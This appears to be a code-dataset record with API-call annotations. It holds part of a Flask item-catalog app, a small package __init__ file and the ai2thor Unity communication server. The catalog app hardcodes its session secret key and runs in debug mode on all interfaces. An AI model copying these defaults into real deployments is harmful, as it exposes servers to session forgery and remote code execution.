session.query(User).filter_by(email=email).one() return user.id except: return None # Revoke current user's token and reset login_session @app.route('/logout') def logout(): if 'provider' in login_session: if login_session['provider'] == 'google': del login_session['gplus_id'] if login_session['provider'] == 'facebook': del login_session['facebook_id'] del login_session['access_token'] del login_session['username'] del login_session['picture'] del login_session['email'] del login_session['token'] flash("You have been successfully logged out.") return redirect(url_for('showCatalog')) else: flash("No user has been logged in.") return redirect(url_for('showCatalog')) # JSON APIs to view Category Information. @app.route('/catalog/JSON') def catalogJSON(): categories = session.query(Category).all() items = session.query(Item).order_by(Item.category_id).limit(3) return jsonify(Categories=[c.serialize for c in categories], Items=[i.serialize for i in items]) @app.route('/catalog/<category>/JSON') def catalogCategoryJSON(category): itemCategory = session.query(Category).filter_by(name=category).first() items = session.query(Item).filter_by(category_id=itemCategory.id).all() return jsonify(Categories=[itemCategory.serialize], Items=[i.serialize for i in items]) @app.route('/catalog/<category>/<item>/JSON') def categoryItemJSON(category, item): itemCategory = session.query(Category).filter_by(name=category).first() item = session.query(Item).filter_by(name=item, category_id=itemCategory.id).first() return jsonify(Category=[itemCategory.serialize], Item=[item.serialize]) # Show all Categories and the latest items @app.route('/') @app.route('/catalog') def showCatalog(): categories = session.query(Category).all() items = session.query(Item).order_by(Item.category_id).limit(3) if 'token' not in login_session: return render_template('publiccatalog.html', categories=categories, items=items) else: return render_template('catalog.html', categories=categories, items=items) # Show Items in a category item @app.route('/catalog/<category>/') def showCatalogCategory(category): itemCategory = session.query(Category).filter_by(name=category).first() items = session.query(Item).filter_by(category_id=itemCategory.id).all() categories = session.query(Category).all() if 'token' not in login_session: return render_template('publiccategory.html', items=items, category=itemCategory, categories=categories) else: return render_template('category.html', items=items, category=itemCategory, categories=categories) # Show an item in a category @app.route('/catalog/<category>/<item>/') def showCategoryItem(category, item): category = session.query(Category).filter_by(name=category).first() item = session.query(Item).filter_by(name=item, category_id=category.id).first() categories = session.query(Category).all() if 'token' not in login_session: return render_template('publiccategoryitem.html', item=item, category=category, categories=categories) return render_template('categoryitem.html', item=item, category=category, categories=categories) # Create a new item @app.route('/catalog/category/new/', methods=['GET', 'POST']) def newCategoryItem(): if 'token' not in login_session: return redirect('/login') categories = session.query(Category).all() user = session.query(User).filter_by(email=login_session['email']).one() if request.method == 'POST': category = session.query(Category).filter_by( name=request.form['category']).first() newItem = Item(name=request.form['name'], description=request.form['description'], category_id=category.id, user_id=user.id) session.add(newItem) session.commit() flash('New Item {} Successfully Added'.format(newItem.name)) return redirect(url_for('showCatalog')) else: return render_template('newcategoryitem.html', categories=categories) # Edit a category item @app.route('/catalog/<category>/<item>/edit', methods=['GET', 'POST']) def editCategoryItem(category, item): if 'token' not in login_session: return redirect('/login') user = session.query(User).filter_by(email=login_session['email']).first() categoryItem = session.query(Category).filter_by(name=category).first() editedItem = session.query(Item).filter_by( name=item, category_id=categoryItem.id).first() categories = session.query(Category).all() if user.id != editedItem.user_id: flash('You are not authorized to edit {}.'.format(item)) return redirect(url_for('showCategoryItem', category=categoryItem.name, item=editedItem.name)) if request.method == 'POST': if request.form['name']: editedItem.name = request.form['name'] if request.form['description']: editedItem.description = request.form['description'] if request.form['category']: category = session.query(Category).filter_by( name=request.form['category']).first() editedItem.category_id = category.id session.add(editedItem) session.commit() flash('Item Successfully Edited') return redirect(url_for('showCategoryItem', category=request.form['category'], item=editedItem.name)) else: return render_template('editcategoryitem.html', category=categoryItem.name, item=editedItem.name, categories=categories, editedItem=editedItem) # Delete a category item @app.route('/catalog/<category>/<item>/delete', methods=['GET', 'POST']) def deleteCategoryItem(category, item): if 'token' not in login_session: return redirect('/login') user = session.query(User).filter_by(email=login_session['email']).first() categoryItem = session.query(Category).filter_by(name=category).first() itemToDelete = session.query(Item).filter_by( name=item, category_id=categoryItem.id).first() if user.id != itemToDelete.user_id: flash('You are not authorized to delete {}.'.format(item)) return redirect(url_for('showCategoryItem', category=categoryItem.name, item=itemToDelete.name)) if request.method == 'POST': session.delete(itemToDelete) session.commit() flash('Item Successfully Deleted') return redirect(url_for('showCatalog')) else: return render_template('deletecategoryitem.html', category=categoryItem.name, item=itemToDelete.name) if __name__ == '__main__': app.secret_key = 'N10kuN!' app.debug = True app.run(host='0.0.0.0', port=5000)
[((448, 463), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (453, 463), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((905, 942), 'sqlalchemy.create_engine', 'create_engine', (['"""sqlite:///catalog.db"""'], {}), "('sqlite:///catalog.db')\n", (918, 942), False, 'from sqlalchemy import create_engine, asc\n'), ((984, 1009), 'sqlalchemy.orm.sessionmaker', 'sessionmaker', ([], {'bind': 'engine'}), '(bind=engine)\n', (996, 1009), False, 'from sqlalchemy.orm import sessionmaker\n'), ((1154, 1183), 'flask.render_template', 'render_template', (['"""login.html"""'], {}), "('login.html')\n", (1169, 1183), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((5104, 5212), 'models.User', 'User', ([], {'username': "login_session['username']", 'email': "login_session['email']", 'picture': "login_session['picture']"}), "(username=login_session['username'], email=login_session['email'],\n picture=login_session['picture'])\n", (5108, 5212), False, 'from models import Base, Category, Item, User\n'), ((6374, 6467), 'flask.jsonify', 'jsonify', ([], {'Categories': '[c.serialize for c in categories]', 'Items': '[i.serialize for i in items]'}), '(Categories=[c.serialize for c in categories], Items=[i.serialize for\n i in items])\n', (6381, 6467), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((6724, 6809), 'flask.jsonify', 'jsonify', ([], {'Categories': '[itemCategory.serialize]', 'Items': '[i.serialize for i in items]'}), '(Categories=[itemCategory.serialize], Items=[i.serialize for i in items]\n )\n', (6731, 6809), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((7128, 7193), 'flask.jsonify', 'jsonify', ([], {'Category': '[itemCategory.serialize]', 'Item': '[item.serialize]'}), '(Category=[itemCategory.serialize], Item=[item.serialize])\n', (7135, 7193), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((8953, 9046), 'flask.render_template', 'render_template', (['"""categoryitem.html"""'], {'item': 'item', 'category': 'category', 'categories': 'categories'}), "('categoryitem.html', item=item, category=category,\n categories=categories)\n", (8968, 9046), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((2218, 2233), 'httplib2.Http', 'httplib2.Http', ([], {}), '()\n', (2231, 2233), False, 'import httplib2\n'), ((2937, 2978), 'requests.get', 'requests.get', (['userinfo_url'], {'params': 'params'}), '(userinfo_url, params=params)\n', (2949, 2978), False, 'import requests\n'), ((2994, 3017), 'json.loads', 'json.loads', (['answer.text'], {}), '(answer.text)\n', (3004, 3017), False, 'import json\n'), ((5957, 6004), 'flask.flash', 'flash', (['"""You have been successfully logged out."""'], {}), "('You have been successfully logged out.')\n", (5962, 6004), False, 'from flask import url_for, flash, make_response\n'), ((6071, 6107), 'flask.flash', 'flash', (['"""No user has been logged in."""'], {}), "('No user has been logged in.')\n", (6076, 6107), False, 'from flask import url_for, flash, make_response\n'), ((7483, 7556), 'flask.render_template', 'render_template', (['"""publiccatalog.html"""'], {'categories': 'categories', 'items': 'items'}), "('publiccatalog.html', categories=categories, items=items)\n", (7498, 7556), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((7613, 7680), 'flask.render_template', 'render_template', (['"""catalog.html"""'], {'categories': 'categories', 'items': 'items'}), "('catalog.html', categories=categories, items=items)\n", (7628, 7680), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((8068, 8169), 'flask.render_template', 'render_template', (['"""publiccategory.html"""'], {'items': 'items', 'category': 'itemCategory', 'categories': 'categories'}), "('publiccategory.html', items=items, category=itemCategory,\n categories=categories)\n", (8083, 8169), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((8253, 8348), 'flask.render_template', 'render_template', (['"""category.html"""'], {'items': 'items', 'category': 'itemCategory', 'categories': 'categories'}), "('category.html', items=items, category=itemCategory,\n categories=categories)\n", (8268, 8348), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((8784, 8883), 'flask.render_template', 'render_template', (['"""publiccategoryitem.html"""'], {'item': 'item', 'category': 'category', 'categories': 'categories'}), "('publiccategoryitem.html', item=item, category=category,\n categories=categories)\n", (8799, 8883), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((9229, 9247), 'flask.redirect', 'redirect', (['"""/login"""'], {}), "('/login')\n", (9237, 9247), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((9528, 9646), 'models.Item', 'Item', ([], {'name': "request.form['name']", 'description': "request.form['description']", 'category_id': 'category.id', 'user_id': 'user.id'}), "(name=request.form['name'], description=request.form['description'],\n category_id=category.id, user_id=user.id)\n", (9532, 9646), False, 'from models import Base, Category, Item, User\n'), ((9885, 9947), 'flask.render_template', 'render_template', (['"""newcategoryitem.html"""'], {'categories': 'categories'}), "('newcategoryitem.html', categories=categories)\n", (9900, 9947), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((10134, 10152), 'flask.redirect', 'redirect', (['"""/login"""'], {}), "('/login')\n", (10142, 10152), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((11183, 11216), 'flask.flash', 'flash', (['"""Item Successfully Edited"""'], {}), "('Item Successfully Edited')\n", (11188, 11216), False, 'from flask import url_for, flash, make_response\n'), ((11416, 11557), 'flask.render_template', 'render_template', (['"""editcategoryitem.html"""'], {'category': 'categoryItem.name', 'item': 'editedItem.name', 'categories': 'categories', 'editedItem': 'editedItem'}), "('editcategoryitem.html', category=categoryItem.name, item=\n editedItem.name, categories=categories, editedItem=editedItem)\n", (11431, 11557), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((11838, 11856), 'flask.redirect', 'redirect', (['"""/login"""'], {}), "('/login')\n", (11846, 11856), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((12465, 12499), 'flask.flash', 'flash', (['"""Item Successfully Deleted"""'], {}), "('Item Successfully Deleted')\n", (12470, 12499), False, 'from flask import url_for, flash, make_response\n'), ((12573, 12672), 'flask.render_template', 'render_template', (['"""deletecategoryitem.html"""'], {'category': 'categoryItem.name', 'item': 'itemToDelete.name'}), "('deletecategoryitem.html', category=categoryItem.name, item\n =itemToDelete.name)\n", (12588, 12672), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((1540, 1596), 'oauth2client.client.flow_from_clientsecrets', 'flow_from_clientsecrets', (['"""client_secrets.json"""'], {'scope': '""""""'}), "('client_secrets.json', scope='')\n", (1563, 1596), False, 'from oauth2client.client import flow_from_clientsecrets\n'), ((3465, 3480), 'httplib2.Http', 'httplib2.Http', ([], {}), '()\n', (3478, 3480), False, 'import httplib2\n'), ((3779, 3794), 'httplib2.Http', 'httplib2.Http', ([], {}), '()\n', (3792, 3794), False, 'import httplib2\n'), ((6029, 6051), 'flask.url_for', 'url_for', (['"""showCatalog"""'], {}), "('showCatalog')\n", (6036, 6051), False, 'from flask import url_for, flash, make_response\n'), ((6132, 6154), 'flask.url_for', 'url_for', (['"""showCatalog"""'], {}), "('showCatalog')\n", (6139, 6154), False, 'from flask import url_for, flash, make_response\n'), ((9836, 9858), 'flask.url_for', 'url_for', (['"""showCatalog"""'], {}), "('showCatalog')\n", (9843, 9858), False, 'from flask import url_for, flash, make_response\n'), ((10586, 10663), 'flask.url_for', 'url_for', (['"""showCategoryItem"""'], {'category': 'categoryItem.name', 'item': 'editedItem.name'}), "('showCategoryItem', category=categoryItem.name, item=editedItem.name)\n", (10593, 10663), False, 'from flask import url_for, flash, make_response\n'), ((11241, 11330), 'flask.url_for', 'url_for', (['"""showCategoryItem"""'], {'category': "request.form['category']", 'item': 'editedItem.name'}), "('showCategoryItem', category=request.form['category'], item=\n editedItem.name)\n", (11248, 11330), False, 'from flask import url_for, flash, make_response\n'), ((12249, 12328), 'flask.url_for', 'url_for', (['"""showCategoryItem"""'], {'category': 'categoryItem.name', 'item': 'itemToDelete.name'}), "('showCategoryItem', category=categoryItem.name, item=itemToDelete.name)\n", (12256, 12328), False, 'from flask import url_for, flash, make_response\n'), ((12524, 12546), 'flask.url_for', 'url_for', (['"""showCatalog"""'], {}), "('showCatalog')\n", (12531, 12546), False, 'from flask import url_for, flash, make_response\n'), ((1844, 1899), 'json.dumps', 'json.dumps', (['"""Failed to upgrade the authorization code."""'], {}), "('Failed to upgrade the authorization code.')\n", (1854, 1899), False, 'import json\n')]
nooproject/noo
noo/impl/utils/__init__.py
238711c55faeb1226a4e5339cd587a312c4babac
from .echo import echo, set_quiet from .errors import NooException, cancel from .store import STORE, FileStore, Store __all__ = ( "FileStore", "NooException", "Store", "STORE", "cancel", "echo", "set_quiet", )
[]
aliang8/ai2thor
ai2thor/server.py
3ef92cf5437e2d60127c77bd59d5b7394eebb36c
# Copyright Allen Institute for Artificial Intelligence 2017 """ ai2thor.server Handles all communication with Unity through a Flask service. Messages are sent to the controller using a pair of request/response queues. """ import json import logging import sys import os import os.path try: from queue import Empty except ImportError: from Queue import Empty import time import warnings from flask import Flask, request, make_response, abort import werkzeug import werkzeug.serving import werkzeug.http import numpy as np from enum import Enum from ai2thor.util.depth import apply_real_noise, generate_noise_indices logging.getLogger('werkzeug').setLevel(logging.ERROR) werkzeug.serving.WSGIRequestHandler.protocol_version = 'HTTP/1.1' MAX_DEPTH = 5000 # get with timeout to allow quit def queue_get(que): res = None while True: try: res = que.get(block=True, timeout=0.5) break except Empty: pass return res class NumpyAwareEncoder(json.JSONEncoder): def default(self, obj): if isinstance(obj, np.generic): return np.asscalar(obj) return super(NumpyAwareEncoder, self).default(obj) class BufferedIO(object): def __init__(self, wfile): self.wfile = wfile self.data = [] def write(self, output): self.data.append(output) def flush(self): self.wfile.write(b"".join(self.data)) self.wfile.flush() def close(self): return self.wfile.close() @property def closed(self): return self.wfile.closed class ThorRequestHandler(werkzeug.serving.WSGIRequestHandler): def run_wsgi(self): old_wfile = self.wfile self.wfile = BufferedIO(self.wfile) result = super(ThorRequestHandler, self).run_wsgi() self.wfile = old_wfile return result class MultiAgentEvent(object): def __init__(self, active_agent_id, events): self._active_event = events[active_agent_id] self.metadata = self._active_event.metadata self.screen_width = self._active_event.screen_width self.screen_height = self._active_event.screen_height self.events = events self.third_party_camera_frames = [] # XXX add methods for depth,sem_seg @property def cv2img(self): return self._active_event.cv2img def add_third_party_camera_image(self, third_party_image_data): self.third_party_camera_frames.append(read_buffer_image(third_party_image_data, self.screen_width, self.screen_height)) def read_buffer_image(buf, width, height, flip_y=True, flip_x=False, dtype=np.uint8, flip_rb_colors=False): im_bytes = np.frombuffer(buf.tobytes(), dtype=dtype) if sys.version_info.major < 3 \ else np.frombuffer(buf, dtype=dtype) im = im_bytes.reshape(height, width, -1) if flip_y: im = np.flip(im, axis=0) if flip_x: im = np.flip(im, axis=1) if flip_rb_colors: im = im[..., ::-1] return im def unique_rows(arr, return_index=False, return_inverse=False): arr = np.ascontiguousarray(arr).copy() b = arr.view(np.dtype((np.void, arr.dtype.itemsize * arr.shape[1]))) if return_inverse: _, idx, inv = np.unique(b, return_index=True, return_inverse=True) else: _, idx = np.unique(b, return_index=True) unique = arr[idx] if return_index and return_inverse: return unique, idx, inv elif return_index: return unique, idx elif return_inverse: return unique, inv else: return unique class Event(object): """ Object that is returned from a call to controller.step(). This class wraps the screenshot that Unity captures as well as the metadata sent about each object """ def __init__(self, metadata): self.metadata = metadata self.screen_width = metadata['screenWidth'] self.screen_height = metadata['screenHeight'] self.frame = None self.depth_frame = None self.normals_frame = None self.flow_frame = None self.color_to_object_id = {} self.object_id_to_color = {} self.instance_detections2D = None self.instance_masks = {} self.class_masks = {} self.instance_segmentation_frame = None self.class_segmentation_frame = None self.class_detections2D = {} self.process_colors() self.process_visible_bounds2D() self.third_party_camera_frames = [] self.third_party_class_segmentation_frames = [] self.third_party_instance_segmentation_frames = [] self.third_party_depth_frames = [] self.third_party_normals_frames = [] self.third_party_flows_frames = [] self.events = [self] # Ensure we have a similar API to MultiAgentEvent @property def image_data(self): warnings.warn("Event.image_data has been removed - RGB data can be retrieved from event.frame and encoded to an image format") return None def process_visible_bounds2D(self): if self.instance_detections2D and len(self.instance_detections2D) > 0: for obj in self.metadata['objects']: obj['visibleBounds2D'] = (obj['visible'] and obj['objectId'] in self.instance_detections2D) def process_colors(self): if 'colors' in self.metadata and self.metadata['colors']: for color_data in self.metadata['colors']: name = color_data['name'] c_key = tuple(color_data['color']) self.color_to_object_id[c_key] = name self.object_id_to_color[name] = c_key def objects_by_type(self, object_type): return [obj for obj in self.metadata['objects'] if obj['objectType'] == object_type] def process_colors_ids(self): if self.instance_segmentation_frame is None: return MIN_DETECTION_LEN = 0 self.instance_detections2D = {} unique_ids, unique_inverse = unique_rows(self.instance_segmentation_frame.reshape(-1, 3), return_inverse=True) unique_inverse = unique_inverse.reshape(self.instance_segmentation_frame.shape[:2]) unique_masks = (np.tile(unique_inverse[np.newaxis, :, :], (len(unique_ids), 1, 1)) == np.arange(len(unique_ids))[:, np.newaxis, np.newaxis]) #for unique_color_ind, unique_color in enumerate(unique_ids): for color_bounds in self.metadata['colorBounds']: color = np.array(color_bounds['color']) color_name = self.color_to_object_id.get(tuple(int(cc) for cc in color), 'background') cls = color_name simObj = False if '|' in cls: cls = cls.split('|')[0] simObj = True bb = np.array(color_bounds['bounds']) bb[[1,3]] = self.metadata['screenHeight'] - bb[[3,1]] if not((bb[2] - bb[0]) < MIN_DETECTION_LEN or (bb[3] - bb[1]) < MIN_DETECTION_LEN): if cls not in self.class_detections2D: self.class_detections2D[cls] = [] self.class_detections2D[cls].append(bb) color_ind = np.argmin(np.sum(np.abs(unique_ids - color), axis=1)) if simObj: self.instance_detections2D[color_name] = bb self.instance_masks[color_name] = unique_masks[color_ind, ...] if cls not in self.class_masks: self.class_masks[cls] = unique_masks[color_ind, ...] else: self.class_masks[cls] = np.logical_or(self.class_masks[cls], unique_masks[color_ind, ...]) def _image_depth(self, image_depth_data, **kwargs): image_depth = read_buffer_image(image_depth_data, self.screen_width, self.screen_height) depth_format = kwargs['depth_format'] image_depth_out = image_depth[:,:,0] + image_depth[:,:,1] / np.float32(256) + image_depth[:,:,2] / np.float32(256 ** 2) multiplier = 1.0 if depth_format != DepthFormat.Normalized: multiplier = kwargs['camera_far_plane'] - kwargs['camera_near_plane'] elif depth_format == DepthFormat.Millimeters: multiplier *= 1000 image_depth_out *= multiplier / 256.0 depth_image_float = image_depth_out.astype(np.float32) if 'add_noise' in kwargs and kwargs['add_noise']: depth_image_float = apply_real_noise( depth_image_float, self.screen_width, indices=kwargs['noise_indices'] ) return depth_image_float def add_image_depth_robot(self, image_depth_data, depth_format, **kwargs): multiplier = 1.0 camera_far_plane = kwargs.pop('camera_far_plane', 1) camera_near_plane = kwargs.pop('camera_near_plane', 0) if depth_format == DepthFormat.Normalized: multiplier = 1.0 / (camera_far_plane - camera_near_plane) elif depth_format == DepthFormat.Millimeters: multiplier = 1000.0 image_depth = read_buffer_image( image_depth_data, self.screen_width, self.screen_height, **kwargs ).reshape(self.screen_height, self.screen_width) * multiplier self.depth_frame = image_depth.astype(np.float32) def add_image_depth(self, image_depth_data, **kwargs): self.depth_frame = self._image_depth(image_depth_data, **kwargs) def add_third_party_image_depth(self, image_depth_data, **kwargs): self.third_party_depth_frames.append(self._image_depth(image_depth_data, **kwargs)) def add_third_party_image_normals(self, normals_data): self.third_party_normals_frames.append(read_buffer_image(normals_data, self.screen_width, self.screen_height)) def add_image_normals(self, image_normals_data): self.normals_frame = read_buffer_image(image_normals_data, self.screen_width, self.screen_height) def add_third_party_image_flows(self, flows_data): self.third_party_flows_frames.append(read_buffer_image(flows_data, self.screen_width, self.screen_height)) def add_image_flows(self, image_flows_data): self.flows_frame = read_buffer_image(image_flows_data, self.screen_width, self.screen_height) def add_third_party_camera_image(self, third_party_image_data): self.third_party_camera_frames.append(read_buffer_image(third_party_image_data, self.screen_width, self.screen_height)) def add_image(self, image_data, **kwargs): self.frame = read_buffer_image(image_data, self.screen_width, self.screen_height, **kwargs) def add_image_ids(self, image_ids_data): self.instance_segmentation_frame = read_buffer_image(image_ids_data, self.screen_width, self.screen_height) self.process_colors_ids() def add_third_party_image_ids(self, image_ids_data): self.third_party_instance_segmentation_frames.append(read_buffer_image(image_ids_data, self.screen_width, self.screen_height)) def add_image_classes(self, image_classes_data): self.class_segmentation_frame = read_buffer_image(image_classes_data, self.screen_width, self.screen_height) def add_third_party_image_classes(self, image_classes_data): self.third_party_class_segmentation_frames.append(read_buffer_image(image_classes_data, self.screen_width, self.screen_height)) def cv2image(self): warnings.warn("Deprecated - please use event.cv2img") return self.cv2img @property def cv2img(self): return self.frame[...,::-1] @property def pose(self): agent_meta = self.metadata['agent'] loc = agent_meta['position'] rotation = round(agent_meta['rotation']['y'] * 1000) horizon = round(agent_meta['cameraHorizon'] * 1000) return (round(loc['x'] * 1000), round(loc['z'] * 1000), rotation, horizon) @property def pose_discrete(self): # XXX should have this as a parameter step_size = 0.25 agent_meta = self.metadata['agent'] loc = agent_meta['position'] rotation = int(agent_meta['rotation']['y'] / 90.0) horizon = int(round(agent_meta['cameraHorizon'])) return (int(loc['x'] / step_size), int(loc['z'] / step_size), rotation, horizon) def get_object(self, object_id): for obj in self.metadata['objects']: if obj['objectId'] == object_id: return obj return None class MultipartFormParser(object): @staticmethod def get_boundary(request_headers): for h, value in request_headers: if h == 'Content-Type': ctype, ct_opts = werkzeug.http.parse_options_header(value) boundary = ct_opts['boundary'].encode('ascii') return boundary return None def __init__(self, data, boundary): self.form = {} self.files = {} full_boundary = b'\r\n--' + boundary view = memoryview(data) i = data.find(full_boundary) while i >= 0: next_offset = data.find(full_boundary, i + len(full_boundary)) if next_offset < 0: break headers_offset = i + len(full_boundary) + 2 body_offset = data.find(b'\r\n\r\n', headers_offset) raw_headers = view[headers_offset: body_offset] body = view[body_offset + 4: next_offset] i = next_offset headers = {} for header in raw_headers.tobytes().decode('ascii').strip().split("\r\n"): k,v = header.split(':') headers[k.strip()] = v.strip() ctype, ct_opts = werkzeug.http.parse_options_header(headers['Content-Type']) cdisp, cd_opts = werkzeug.http.parse_options_header(headers['Content-disposition']) assert cdisp == 'form-data' if 'filename' in cd_opts: if cd_opts['name'] not in self.files: self.files[cd_opts['name']] = [] self.files[cd_opts['name']].append(body) else: if ctype == 'text/plain' and 'charset' in ct_opts: body = body.tobytes().decode(ct_opts['charset']) if cd_opts['name'] not in self.form: self.form[cd_opts['name']] = [] self.form[cd_opts['name']].append(body) class DepthFormat(Enum): Meters = 0, Normalized = 1, Millimeters = 2 class Server(object): def __init__( self, request_queue, response_queue, host, port=0, threaded=False, depth_format=DepthFormat.Meters, add_depth_noise=False, width=300, height=300 ): app = Flask(__name__, template_folder=os.path.realpath( os.path.join( os.path.dirname(os.path.abspath(__file__)), '..', 'templates'))) self.image_buffer = None self.app = app self.client_token = None self.subscriptions = [] self.app.config.update(PROPAGATE_EXCEPTIONS=False, JSONIFY_PRETTYPRINT_REGULAR=False) self.port = port self.last_rate_timestamp = time.time() self.frame_counter = 0 self.debug_frames_per_interval = 50 self.xwindow_id = None self.wsgi_server = werkzeug.serving.make_server(host, self.port, self.app, threaded=threaded, request_handler=ThorRequestHandler) # used to ensure that we are receiving frames for the action we sent self.sequence_id = 0 self.last_event = None self.camera_near_plane = 0.1 self.camera_far_plane = 20.0 self.depth_format = depth_format self.add_depth_noise = add_depth_noise self.noise_indices = None if add_depth_noise: assert width == height,\ "Noise supported with square dimension images only." self.noise_indices = generate_noise_indices(width) @app.route('/ping', methods=['get']) def ping(): return 'pong' @app.route('/train', methods=['post']) def train(): if request.headers['Content-Type'].split(';')[0] == 'multipart/form-data': form = MultipartFormParser(request.get_data(), MultipartFormParser.get_boundary(request.headers)) metadata = json.loads(form.form['metadata'][0]) token = form.form['token'][0] else: form = request metadata = json.loads(form.form['metadata']) token = form.form['token'] if self.client_token and token != self.client_token: abort(403) if self.frame_counter % self.debug_frames_per_interval == 0: now = time.time() # rate = self.debug_frames_per_interval / float(now - self.last_rate_timestamp) self.last_rate_timestamp = now # import datetime # print("%s %s/s" % (datetime.datetime.now().isoformat(), rate)) if metadata['sequenceId'] != self.sequence_id: raise ValueError("Sequence id mismatch: %s vs %s" % ( metadata['sequenceId'], self.sequence_id)) events = [] for i, a in enumerate(metadata['agents']): e = Event(a) image_mapping = dict( image=e.add_image, image_depth=lambda x: e.add_image_depth( x, depth_format=self.depth_format, camera_near_plane=self.camera_near_plane, camera_far_plane=self.camera_far_plane, add_noise=self.add_depth_noise, noise_indices=self.noise_indices ), image_ids=e.add_image_ids, image_classes=e.add_image_classes, image_normals=e.add_image_normals, image_flows=e.add_image_flows ) for key in image_mapping.keys(): if key in form.files: image_mapping[key](form.files[key][i]) third_party_image_mapping = dict( image=e.add_image, image_thirdParty_depth=lambda x: e.add_third_party_image_depth( x, depth_format=self.depth_format, camera_near_plane=self.camera_near_plane, camera_far_plane=self.camera_far_plane ), image_thirdParty_image_ids=e.add_third_party_image_ids, image_thirdParty_classes=e.add_third_party_image_classes, image_thirdParty_normals=e.add_third_party_image_normals, image_thirdParty_flows=e.add_third_party_image_flows ) if a['thirdPartyCameras'] is not None: for ti, t in enumerate(a['thirdPartyCameras']): for key in third_party_image_mapping.keys(): if key in form.files: third_party_image_mapping[key](form.files[key][ti]) events.append(e) if len(events) > 1: self.last_event = event = MultiAgentEvent(metadata['activeAgentId'], events) else: self.last_event = event = events[0] for img in form.files.get('image-thirdParty-camera', []): self.last_event.add_third_party_camera_image(img) request_queue.put_nowait(event) self.frame_counter += 1 next_action = queue_get(response_queue) if 'sequenceId' not in next_action: self.sequence_id += 1 next_action['sequenceId'] = self.sequence_id else: self.sequence_id = next_action['sequenceId'] resp = make_response(json.dumps(next_action, cls=NumpyAwareEncoder)) return resp def start(self): self.wsgi_server.serve_forever() def set_init_params(self, init_params): self.camera_near_plane = init_params['cameraNearPlane'] self.camera_far_plane = init_params['cameraFarPlane']
[((633, 662), 'logging.getLogger', 'logging.getLogger', (['"""werkzeug"""'], {}), "('werkzeug')\n", (650, 662), False, 'import logging\n'), ((2804, 2835), 'numpy.frombuffer', 'np.frombuffer', (['buf'], {'dtype': 'dtype'}), '(buf, dtype=dtype)\n', (2817, 2835), True, 'import numpy as np\n'), ((2909, 2928), 'numpy.flip', 'np.flip', (['im'], {'axis': '(0)'}), '(im, axis=0)\n', (2916, 2928), True, 'import numpy as np\n'), ((2957, 2976), 'numpy.flip', 'np.flip', (['im'], {'axis': '(1)'}), '(im, axis=1)\n', (2964, 2976), True, 'import numpy as np\n'), ((3168, 3222), 'numpy.dtype', 'np.dtype', (['(np.void, arr.dtype.itemsize * arr.shape[1])'], {}), '((np.void, arr.dtype.itemsize * arr.shape[1]))\n', (3176, 3222), True, 'import numpy as np\n'), ((3269, 3321), 'numpy.unique', 'np.unique', (['b'], {'return_index': '(True)', 'return_inverse': '(True)'}), '(b, return_index=True, return_inverse=True)\n', (3278, 3321), True, 'import numpy as np\n'), ((3349, 3380), 'numpy.unique', 'np.unique', (['b'], {'return_index': '(True)'}), '(b, return_index=True)\n', (3358, 3380), True, 'import numpy as np\n'), ((4918, 5054), 'warnings.warn', 'warnings.warn', (['"""Event.image_data has been removed - RGB data can be retrieved from event.frame and encoded to an image format"""'], {}), "(\n 'Event.image_data has been removed - RGB data can be retrieved from event.frame and encoded to an image format'\n )\n", (4931, 5054), False, 'import warnings\n'), ((11435, 11488), 'warnings.warn', 'warnings.warn', (['"""Deprecated - please use event.cv2img"""'], {}), "('Deprecated - please use event.cv2img')\n", (11448, 11488), False, 'import warnings\n'), ((15304, 15315), 'time.time', 'time.time', ([], {}), '()\n', (15313, 15315), False, 'import time\n'), ((15449, 15563), 'werkzeug.serving.make_server', 'werkzeug.serving.make_server', (['host', 'self.port', 'self.app'], {'threaded': 'threaded', 'request_handler': 'ThorRequestHandler'}), '(host, self.port, self.app, threaded=threaded,\n request_handler=ThorRequestHandler)\n', (15477, 15563), False, 'import werkzeug\n'), ((1125, 1141), 'numpy.asscalar', 'np.asscalar', (['obj'], {}), '(obj)\n', (1136, 1141), True, 'import numpy as np\n'), ((3118, 3143), 'numpy.ascontiguousarray', 'np.ascontiguousarray', (['arr'], {}), '(arr)\n', (3138, 3143), True, 'import numpy as np\n'), ((6520, 6551), 'numpy.array', 'np.array', (["color_bounds['color']"], {}), "(color_bounds['color'])\n", (6528, 6551), True, 'import numpy as np\n'), ((6822, 6854), 'numpy.array', 'np.array', (["color_bounds['bounds']"], {}), "(color_bounds['bounds'])\n", (6830, 6854), True, 'import numpy as np\n'), ((8468, 8560), 'ai2thor.util.depth.apply_real_noise', 'apply_real_noise', (['depth_image_float', 'self.screen_width'], {'indices': "kwargs['noise_indices']"}), "(depth_image_float, self.screen_width, indices=kwargs[\n 'noise_indices'])\n", (8484, 8560), False, 'from ai2thor.util.depth import apply_real_noise, generate_noise_indices\n'), ((13697, 13756), 'werkzeug.http.parse_options_header', 'werkzeug.http.parse_options_header', (["headers['Content-Type']"], {}), "(headers['Content-Type'])\n", (13731, 13756), False, 'import werkzeug\n'), ((13786, 13852), 'werkzeug.http.parse_options_header', 'werkzeug.http.parse_options_header', (["headers['Content-disposition']"], {}), "(headers['Content-disposition'])\n", (13820, 13852), False, 'import werkzeug\n'), ((16061, 16090), 'ai2thor.util.depth.generate_noise_indices', 'generate_noise_indices', (['width'], {}), '(width)\n', (16083, 16090), False, 'from ai2thor.util.depth import apply_real_noise, generate_noise_indices\n'), ((8003, 8023), 'numpy.float32', 'np.float32', (['(256 ** 2)'], {}), '(256 ** 2)\n', (8013, 8023), True, 'import numpy as 